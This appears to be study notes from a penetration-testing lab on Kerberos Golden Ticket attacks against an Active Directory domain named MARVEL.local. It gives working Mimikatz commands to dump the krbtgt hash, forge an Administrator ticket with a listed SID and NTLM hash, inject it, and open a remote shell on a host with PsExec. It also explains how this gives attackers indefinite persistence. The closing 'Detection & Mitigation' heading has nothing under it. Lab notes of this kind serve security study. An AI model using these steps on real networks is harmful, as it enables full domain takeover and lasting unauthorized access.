What is it?

• When we compromise the krbtgt account, we own the domain
• We can request access to any resource or system on the domain
• Golden tickets == complete access to every machine

Golden Ticket vs. Pass-the-Ticket

Example Use Case

1. Golden Ticket for Long-Term Persistence
   • If an attacker wants to maintain persistent access, they use Golden Tickets.
   • Since krbtgt hashes change only when manually reset, the attack lasts indefinitely.
2. Pass-the-Ticket for Quick Access
   • If an attacker gains access to a stolen TGT, they can use Pass-the-Ticket to move laterally without needing credentials.

Create a Golden Ticket

1. Login to Domain Controller (Server) and open CMD as administrator

2. Use Mimikatz to pull down the krbtgt account

   lsadump::lsa /inject /name:krbtgt
   

   

   

3. Grab the SID and NTLM hash to generate the Golden Ticket

   S-1-5-21-2828008126-1612423536-1023625581
   e5efba889e477a42ce92a08a552388d6
   

4. Generate Golden Ticket

   

   kerberos::golden /User:Administrator /domain:MARVEL.local /sid:S-1-5-21-2828008126-1612423536-1023625581 /krbtgt:e5efba889e477a42ce92a08a552388d6 /id:500 /ptt
   

   • /User: Can be a fake user
   • /domain: Must be a real domain
   • /sid: SID
   • /krbtgt: NTLM Hash
   • /id: The RID of user, 500 for administrator (See NTLM hash)
   • /ptt: Pass the ticket

5. Spawn a new command prompt

   

   misc::cmd
   

   • misc::cmd command is used to spawn a new command prompt (cmd.exe) with the injected Kerberos ticket, allowing you to use the forged credentials for authentication within that session.

   Use Domain Privileges

   • In the new command prompt, you can now access domain resources without needing credentials:

   

6. Use psexec.exe to get a shell

   PsExec.exe \\\\THEPUNISHER cmd.exe
   

   

   

Detection & Mitigation